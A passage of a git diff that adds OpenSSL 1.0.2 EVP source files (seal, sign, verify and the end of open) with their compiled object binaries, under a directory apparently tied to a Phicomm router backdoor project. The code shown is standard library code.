+ err:
+    if (key != NULL)
+        OPENSSL_cleanse(key, size);
+    OPENSSL_free(key);
+    return (ret);
+}
+
+int EVP_OpenFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int i;
+
+    i = EVP_DecryptFinal_ex(ctx, out, outl);
+    if (i)
+        i = EVP_DecryptInit_ex(ctx, NULL, NULL, NULL, NULL);
+    return (i);
+}
+#else                           /* !OPENSSL_NO_RSA */
+
+# ifdef PEDANTIC
+static void *dummy = &dummy;
+# endif
+
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_open.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_open.o
new file mode 100644
index 0000000000000000000000000000000000000000..5d67b39754ca3d8f69622ab3179c3d907b09c7cf
GIT binary patch
literal 2880
zcmbuA&2Jk;6u`%^o0xvA-SB0p6s=H%QqiuwrHE1?<h8TTT5M~}b_!7`i{orQsJ~dR
zrKHesh>Tc;KqZ7Y^A8|#DX0fn2p{55ih6(pHzY)@QdOuThbmHeZ+9o2Y`hnE((JtX
z&3kWV-i)8$meuS~C`71)$P1)DqLdJOq_3wOHAOgbfZUBeeouNyvaU;KbJj1?)M@LQ
zRL)sjQzd2fuY_tv#+2@6C-w!#Jl(zBIokUNG{rK<qBk*&vId$g+TxGm4b}S7VO_g(
zz4sGLN~@R1u=#{Def4z!U(Uhjt6}(vw;fZ_?tKiS+}b7H8DBjIBW3*=_>%RdA#1~3
z#QIKwpoiT+63q1jd0}pqRBKbUdK1<?#rna4*7sd|<w$>1=3#X$GA7;-Hx;Yb$FYy>
z*cJQMkZ3E_yNY!Oj_kODt#7pYZQ|T{=@sd`^s1z7VCFDKiuKlZE<o$r=BSqsSO{Et
zcoql_>PAazw)BQjC1f&_ImM4p&2$=Ohks6ZT1XxfpY1q9apibYNS-+2V)O=yK#N1$
z18wrm6d8gmMHYsJ@{rq+(8VGNEyY8J_K!p_!=)*}AM@r;;U#9d_y<EWmv}!cbNqTl
z=EmRKGr=X_8J4({t0NO!A$%~zos_tw#EqvpKFuZ4Ts+N1!Ig)$01f2?eiV*>Z7&y<
z_hp@VL_vZ}N66pz2hE2EzF0gPJ>5>Pu#=6Q3`b!nJA*j$_?hW2!Bg#)FnM4X-0Kj`
z{%#2qe9=242E$S2Tu$zR;a%W8`sFx)K|CA4rvvzW0B;5Gl>q)>0RJq2e;vTD0mnSh
z^E>Yb*lz*$Wcw!~sF@^@&la>i{A6;CMU!ZgYCbKgT0WaC$z`o9rBzvTOftEGA{Vtx
z`DJYpEzxa4uNuoO6FoJ3iO9vG*6M(27)^r|OOn=Jyr`2*ak@~>YxPR4)~q^yg%{;%
zZPs<xnzdQ~0&U&YF6hfzO>fMb3nX8V&y-54R;}rkMteKpoT2NEC+<GG*r?RlO*sH}
zMV^N|px|%$0JN?9t`rc0Am^Y_{w6{Y<oL!YUqc9j9N!V;SY1(|UO2Cs@=qM<+8+d+
z@^2W<#{ZS!qm2C@41bW}TMTFS{|FWW5Zou$EV}L(!yjh2!th5KUS&8Np9dQhJTEpX
zHBX_OzDFXom+NL_271$Q`vs~QdaWXu`jSb6*@{^q!c4nO1fz)qG#3St2-Rl2t~bD>
z(KK}dO7pR{S*c#|#`BGi&@!Ot8|E^&VnBUCn=>kPo$l=a^*p#^D*P2F1q`L(<;fkn
zwp7Rd5H!4t6f{<BuhbPh|9votDy^6a&-h7?`z!UQzI8owrXsrJD0CR}zxs>di%Vhs
zWQDHpujF)Fv`>K(>Pgla^v^wmr+l3H(LM+BRA)_p9|Q;3VjahSC-$vkoSU9Mj{`<%
z{waC`6g2hwM?LT^HS~JFKmINT-GAKs%cOb1`^Q{Te|rCe*2bkSd+VpXem^jb;rGXw
h{<{Z6e#T9K+;O|@uRpC=y9W8Ey#3R9Ndx%({{<f}ur>ey

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_seal.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_seal.c
new file mode 100644
index 0000000..caabbf4
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_seal.c
@@ -0,0 +1,120 @@
+/* crypto/evp/p_seal.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/rand.h>
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int EVP_SealInit(EVP_CIPHER_CTX *ctx, const EVP_CIPHER *type,
+                 unsigned char **ek, int *ekl, unsigned char *iv,
+                 EVP_PKEY **pubk, int npubk)
+{
+    unsigned char key[EVP_MAX_KEY_LENGTH];
+    int i;
+
+    if (type) {
+        EVP_CIPHER_CTX_init(ctx);
+        if (!EVP_EncryptInit_ex(ctx, type, NULL, NULL, NULL))
+            return 0;
+    }
+    if ((npubk <= 0) || !pubk)
+        return 1;
+    if (EVP_CIPHER_CTX_rand_key(ctx, key) <= 0)
+        return 0;
+    if (EVP_CIPHER_CTX_iv_length(ctx))
+        RAND_pseudo_bytes(iv, EVP_CIPHER_CTX_iv_length(ctx));
+
+    if (!EVP_EncryptInit_ex(ctx, NULL, NULL, key, iv))
+        return 0;
+
+    for (i = 0; i < npubk; i++) {
+        ekl[i] =
+            EVP_PKEY_encrypt_old(ek[i], key, EVP_CIPHER_CTX_key_length(ctx),
+                                 pubk[i]);
+        if (ekl[i] <= 0)
+            return (-1);
+    }
+    return (npubk);
+}
+
+/*- MACRO
+void EVP_SealUpdate(ctx,out,outl,in,inl)
+EVP_CIPHER_CTX *ctx;
+unsigned char *out;
+int *outl;
+unsigned char *in;
+int inl;
+        {
+        EVP_EncryptUpdate(ctx,out,outl,in,inl);
+        }
+*/
+
+int EVP_SealFinal(EVP_CIPHER_CTX *ctx, unsigned char *out, int *outl)
+{
+    int i;
+    i = EVP_EncryptFinal_ex(ctx, out, outl);
+    if (i)
+        i = EVP_EncryptInit_ex(ctx, NULL, NULL, NULL, NULL);
+    return i;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_seal.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_seal.o
new file mode 100644
index 0000000000000000000000000000000000000000..aef529f1c6e3189f35fc189432ffa793623f3a02
GIT binary patch
literal 2680
zcmbu9O>7%Q6oALE(}X77q@hwH6`@5kD2Qg|rIngisLDECXVY%mC~-;<gz4Je)>a(b
zve(E)Rf=S}Vr5$31Q(<pkdWX+Z%92@^oLf!C5OVT9E#K^4G1Ac6cFLP-I-*&*c{+V
zZ|BXo@9n(zW_B*9db}$TAY20EDA}HIO2}Bxwmt5c<75}<C%+Cn{k!tAa(c?XtIVCS
zZz_p7-Trn~v;WZQ4>OwGAC5IY4qt(YwAKtgI|7Dg$HMb+OKWUYo>Uw62QFVj*jTUZ
zU%l$Qw!*y+z#v)^ELCpFcjOh#zUQz;tMc{gMR=)SIv*Yes@s3D7t5t>Cu@k?y8W|#
z%khv`<c$;d1Koba-!)p+QB__)*3{P_t9zQQvz3oGU;0UF!VJD{f60>B6OP)UPaCb}
zy;GYv)x!@je6_Y)mG7_hE7!1NYayln&8F6b;?mjyw^Xa!jji9v#OxnlT~J<A7L?Z&
zdL7#a4T1vBZxss`Bs9bdmN&Hejp0@71M~{a>tu3b;)pmhm#pNiig;K$AVo&yLltK#
zFTWU(A_t#$F~o#G2SK|*Cr{3iE<#$!f}kjS+<^q%oFRegU|?T=Pw#tBh6em8_U;gt
z6&D8I?TQM+mxHPxUJ9wg$UEJN5V^P`CXCg4CWR}3U|&EOiwO}$7>NoZxJHG+sL)G@
z2;mv_t%Epff_P@9(5v>v@%6t7E*&DjY_@X>wmqR(8?Wy1sG!r0#~IFoWXC_D!##)H
z;}In7vkp34_BevM6LiRvr_)PddqHtu{4xrl9alQ=L<gShz#AR-2Oaq59r&#d{5#-S
zFR#<tZ(u)m@FzuDHjSK=BI@aBIt%7hK5G#=sh^4}Iz1JS&#DQUP@=j@9hZrzX-%D>
z6N!16MNbS<^Qls;XkjEZtA4kVkx$b_v*zd7H)zhxpR+P#MmZUy#j;sR7ih9(nPtB#
zL~~zUZ~D0U3N_tDX(5*;l$I?cwMbK$MS9lA=A3veCZ5e3?u_N=08Em}JR9+!>;wIC
z(-qu56y*J&oa6qXAm0Vb`TGb#kPD!ke}oXk&p&ao!w10T{$F^wcij~a$MebkabHpJ
z`@2Coe+GYC5adIkoU0y=cMs=hJlwmk2tFuqZ#n8r;KBRDIX`biD%X}QBMGBba>op}
zN@mWGEVF76DQ#E=k&@*yky3@FB{L5!U$9IG?#NMRFWLNDz9JP%g`!!qYD99rU}osq
zlCfm+RQ}f}LNu1{zk$Yqp)9h#xHH$6+c@q6#U77?dZpU!&O{cE_Yj)=<{D<s&oS=5
zF+cOI%iNuBa2v<{p!m)I8ZSdEE)@aw3Sa*PF9e&X#m6Ha=5@Wx9lWrO?=fI_%i}rn
z%J(c@^g^(C|2R&9fv*1e-&p+H+>wp`_yyqY_U}V>Ab4MJ|1g%v^ZjeLHZJuRONi%z
ocgquP;*t6H4iKqgQXr4qVe84t+M44(-!A?(%b)+JJis6SHzn+#*Z=?k

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_sign.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_sign.c
new file mode 100644
index 0000000..1b9ba06
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_sign.c
@@ -0,0 +1,133 @@
+/* crypto/evp/p_sign.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+#ifdef undef
+void EVP_SignInit(EVP_MD_CTX *ctx, EVP_MD *type)
+{
+    EVP_DigestInit_ex(ctx, type);
+}
+
+void EVP_SignUpdate(EVP_MD_CTX *ctx, unsigned char *data, unsigned int count)
+{
+    EVP_DigestUpdate(ctx, data, count);
+}
+#endif
+
+int EVP_SignFinal(EVP_MD_CTX *ctx, unsigned char *sigret,
+                  unsigned int *siglen, EVP_PKEY *pkey)
+{
+    unsigned char m[EVP_MAX_MD_SIZE];
+    unsigned int m_len;
+    int i = 0, ok = 0, v;
+    EVP_MD_CTX tmp_ctx;
+    EVP_PKEY_CTX *pkctx = NULL;
+
+    *siglen = 0;
+    EVP_MD_CTX_init(&tmp_ctx);
+    if (!EVP_MD_CTX_copy_ex(&tmp_ctx, ctx))
+        goto err;
+    if (!EVP_DigestFinal_ex(&tmp_ctx, &(m[0]), &m_len))
+        goto err;
+    EVP_MD_CTX_cleanup(&tmp_ctx);
+
+    if (ctx->digest->flags & EVP_MD_FLAG_PKEY_METHOD_SIGNATURE) {
+        size_t sltmp = (size_t)EVP_PKEY_size(pkey);
+        i = 0;
+        pkctx = EVP_PKEY_CTX_new(pkey, NULL);
+        if (!pkctx)
+            goto err;
+        if (EVP_PKEY_sign_init(pkctx) <= 0)
+            goto err;
+        if (EVP_PKEY_CTX_set_signature_md(pkctx, ctx->digest) <= 0)
+            goto err;
+        if (EVP_PKEY_sign(pkctx, sigret, &sltmp, m, m_len) <= 0)
+            goto err;
+        *siglen = sltmp;
+        i = 1;
+ err:
+        EVP_PKEY_CTX_free(pkctx);
+        return i;
+    }
+
+    for (i = 0; i < 4; i++) {
+        v = ctx->digest->required_pkey_type[i];
+        if (v == 0)
+            break;
+        if (pkey->type == v) {
+            ok = 1;
+            break;
+        }
+    }
+    if (!ok) {
+        EVPerr(EVP_F_EVP_SIGNFINAL, EVP_R_WRONG_PUBLIC_KEY_TYPE);
+        return (0);
+    }
+
+    if (ctx->digest->sign == NULL) {
+        EVPerr(EVP_F_EVP_SIGNFINAL, EVP_R_NO_SIGN_FUNCTION_CONFIGURED);
+        return (0);
+    }
+    return (ctx->digest->sign(ctx->digest->type, m, m_len, sigret, siglen,
+                              pkey->pkey.ptr));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_sign.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_sign.o
new file mode 100644
index 0000000000000000000000000000000000000000..0c2f4774e32be9591fc72b59a43c12f19e9378e8
GIT binary patch
literal 2736
zcmbuA;cHt}6u@u#(zUwuHP$JGiR43+4BaDfg55sMyfjH)=Id75bShdOY4X;DrY|9R
zVeQb!$Ra+Tor0kID1K4#FK~(m9CQPbp&u0V!#)UWsR%=yV<_>Q``$ITG4G2WIPaeO
zyXTyH-?=X*ucg%Vkk3b$_{ee6n=wjAb);v<sTn6@BtU)}fB3HaoP1hd%vit6*^Kq|
zqGJ8Epjh82=YP2bjs?Z`KN0~$u`Yz)fHBtD8o~tX<}2Yz)#`5JM6rHlX1mkapNe%;
zv7dK7p>AeaQ8u&T063`DZR+0cm_IRp#eS72_DryK!#{rE9gMJUQm5E$u#`)Rl?(?d
z$XHtnM1G)HTaevN)Xb>%EJ?*Wt#7)Y;+tQ-LvuLiYImB4l6Ep2z!L;j>z2wNv^l20
zT2THR<1B%lXty9AJrFjdN~_~nT6coxsGS{|Yk%9=hHYZkE*s$e#VS0$+y@VKlwAql
zA`S;^1RS>_Ebe|kYpdaq4X>ZEeo(C)`)Q~__quFdQEaE41?7lSU~`zhl5+kE);($6
zcyUR7NnVm)mbI_Q%=GlJP-JnrVVI53QR#>jJsf+gL8r0i6HzJp<RJ$`D2g962s#Wp
zb8?Zum35E_peP5Nf%wkN6W@B!cQ7zA`Zkn71^$q`_92!fEe78jN{Eveg@hQ|^rytg
zo5M*l`ue`4IMo_CAzt?h>ppP`kSs>P1zZziFd>e*NjwHj?I*XogO-JXUof7XoqlhW
zK;L#R!<j(ve*P^2;eHI<vOoqOTA)?r9KpO7bb>o4trf6IP^^2uNB{=$;~xB34_@%#
zXFYh^gTL#+Klb3CdGKo<{6`PI<H1Q)tCv;`DNj<T=d=Yd(<LKUCfba8Dj}=dsdRcF
zmDRFxLQQGZXEv!#XP?(fM#<#o`AT&|)7L3VmR9t-NfR;TM&-+T&S+Gr*W5Fy7hv;q
zdT)k_4gG8n;Msax(FpX(o3-*@r``<L&(w6tIzO*f8>Xh$YLyz%w7QwguWI??s&*z<
zDnmU`rk#O)$@{_nv+Kx7jt4ki<M<fIn;aK8{vOB2IsOsH@%v=^;(eoF&$thialBU)
z<P)Hb|A7z$`Td}b2l0mvf*gAe<7tjR!10S5e~{xLuu<@@hyMN089b!=#+sR1hS97!
zW06@ky_}OwecdEdA!p`@v|O(fDPLJz(+yxo#ndI}jfd%lxbqdGAysRYs$MfUh(t5!
zMYzY@n$C9oUt<WO@fG_!Qydry>m$z0@ntrS2SKrxaZp~aVxtEMx%I>TgeL1~*q2Zq
z1x4Q9NpHGw=)+4tejFAt=YNflK`iEsg7U)le~gD<v;En4jAOj(#Ga3$x5DBWIROTC
z|9<yL7lfFjJF@yQybK2B?2n&vL6JGSV}JY-@Im*t?S2sKp78!Kmc=tZXm8x=eRuze
pJ7N#HXFxo%{<{N2uHvCU?mELi&;I&hFBlZh{!&>#V+s1>{{}ckt6Km7

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_verify.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_verify.c
new file mode 100644
index 0000000..65e1e21
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_verify.c
@@ -0,0 +1,116 @@
+/* crypto/evp/p_verify.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include <openssl/evp.h>
+#include <openssl/objects.h>
+#include <openssl/x509.h>
+
+int EVP_VerifyFinal(EVP_MD_CTX *ctx, const unsigned char *sigbuf,
+                    unsigned int siglen, EVP_PKEY *pkey)
+{
+    unsigned char m[EVP_MAX_MD_SIZE];
+    unsigned int m_len;
+    int i = 0, ok = 0, v;
+    EVP_MD_CTX tmp_ctx;
+    EVP_PKEY_CTX *pkctx = NULL;
+
+    EVP_MD_CTX_init(&tmp_ctx);
+    if (!EVP_MD_CTX_copy_ex(&tmp_ctx, ctx))
+        goto err;
+    if (!EVP_DigestFinal_ex(&tmp_ctx, &(m[0]), &m_len))
+        goto err;
+    EVP_MD_CTX_cleanup(&tmp_ctx);
+
+    if (ctx->digest->flags & EVP_MD_FLAG_PKEY_METHOD_SIGNATURE) {
+        i = -1;
+        pkctx = EVP_PKEY_CTX_new(pkey, NULL);
+        if (!pkctx)
+            goto err;
+        if (EVP_PKEY_verify_init(pkctx) <= 0)
+            goto err;
+        if (EVP_PKEY_CTX_set_signature_md(pkctx, ctx->digest) <= 0)
+            goto err;
+        i = EVP_PKEY_verify(pkctx, sigbuf, siglen, m, m_len);
+ err:
+        EVP_PKEY_CTX_free(pkctx);
+        return i;
+    }
+
+    for (i = 0; i < 4; i++) {
+        v = ctx->digest->required_pkey_type[i];
+        if (v == 0)
+            break;
+        if (pkey->type == v) {
+            ok = 1;
+            break;
+        }
+    }
+    if (!ok) {
+        EVPerr(EVP_F_EVP_VERIFYFINAL, EVP_R_WRONG_PUBLIC_KEY_TYPE);
+        return (-1);
+    }
+    if (ctx->digest->verify == NULL) {
+        EVPerr(EVP_F_EVP_VERIFYFINAL, EVP_R_NO_VERIFY_FUNCTION_CONFIGURED);
+        return (0);
+    }
+
+    return (ctx->digest->verify(ctx->digest->type, m, m_len,
+                                sigbuf, siglen, pkey->pkey.ptr));
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_verify.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/p_verify.o
new file mode 100644
index 0000000000000000000000000000000000000000..257a31ddbf47638d3574de77739f87b9d3333ea1
GIT binary patch
literal 2672
zcmbu9-EZ4e6u@tqbS<Ov!T>4K(3FROieOf}A<^!E)~TJk;IgVq3KJA7P2DzH>PC(Y
zDIbF=D%8q4_7@=W#yd~!VMN-{gv2HULLelh36Nka9~z*lARwG`?VH?&_yvx1eb4>f
zbIv{Y!{=31&-O(kgh_-vMmi%#2}uuh^l_?=lLKUk{Ce=nAM#W3+?2N?=cl~C<Xm3!
zuAlNg)z1B}33iKGBX<8VD4M6FYEo0*T1*Y<-gn<)4Bh*QsT)mqzx1OjeR~VN^sSdu
zBidFj6@z)*`<q&CG@Y-Q`BdW-qBSPt^_wxLs(C+4J97P_7B$nn4>T}UH1AsAc6MaC
zF-=sdS-;VG4>xyd7e3&{<`YUoNyWS`b?<lG+hG&3ca^Ez?r5Gkl2&iVwEAw`8EoVR
zW;Q-?Z$VJ$!%G%~yIh9P`}^S2&SZNGQq&+B_lR#-+G7Wsr3q{&^u~0u0h^V*FLdvA
zV+?lO`WTmov}%jmasLFJet&=Gu5Lmc#k={;y!@;@FFz+6SIFeV#EIl^e!;aIH#sUE
z7t=?jM_oFU&K^sP=|>*)F}R|{pv9r}Lz{duPx=UHB8x&pxySEF<i%MMsl_9QhXw{O
z!rAG-?+fPMz_ZK>@i+T2LgGSH6_Q&qRTw_sFAM3{_bI|iePBvxMxv)9!iXZIWnnlY
zB*8Qz#52NR5G16-&@pnm)oVK1^MzvWEc?A)QM%i`3`bFd*Y$6S67I2c(^1kp=_ox#
z&JffgXot8w=~)58v%_=mmSX^V@k|KMhwzmU{!$1(AHv@b;qQj<D<S-|5dKXFCl%v)
z(=IKoi$$W&%@}iZkS$q-GBGCglNnhzPG+;G)SQu%GrDR}t7*lU$USY8tdhfzi))p2
z!>m!Hl$On^Ljy4scooZL!E!6qYUT;`G!12$FLZ#PQ73%cs_59|ZnMr9Q(Cf3lc=+^
zM#Xgu)3(=aVi;AYP&{K4SI!tqg%Z{cLPqJ=|1a+Z{m+&!3diwHF}}?4101h%T;TWx
zjvwUsTO7yt$Kqe+_+1?Toa2W${x!$%=6C{sWDu+^SW{U1u@G)?{9evJ2|5bYDca}&
zKVo%#)hR4M@7R97!Zh0~7evRbIYeA6I0YguRI5ZRuC1<`7BFkgF-53-N9lD0<7LYg
zEB0E&w4HS#(g@}X++tzXY%lqLlq5Lg7P~9YI4~4eC;X9b%XI7yL&LKihsMh$7IKhe
zaDMwiN0n8q1WtlH01bI}rMwpSp$#wH_+gmDnE%yZ0$+@ohQ<q9{~;cN&emuB36Alm
zzc2$H_ON{%7*=<DN4)F?{z)E!&d!hF1yInm+dmNitiQZ;`_IE<ulsu^co6KK@cz)3
z`7_>YZCvlQVEuT|V-2~Zhd;9Jy8}cnVp1T#`Ca?leXLjudighl{QYXyc5mMwBmV&E
CN~4<q

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_fn.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/evp/pmeth_fn.c
new file mode 100644
index 0000000..a8b7f2f
--- /dev/null
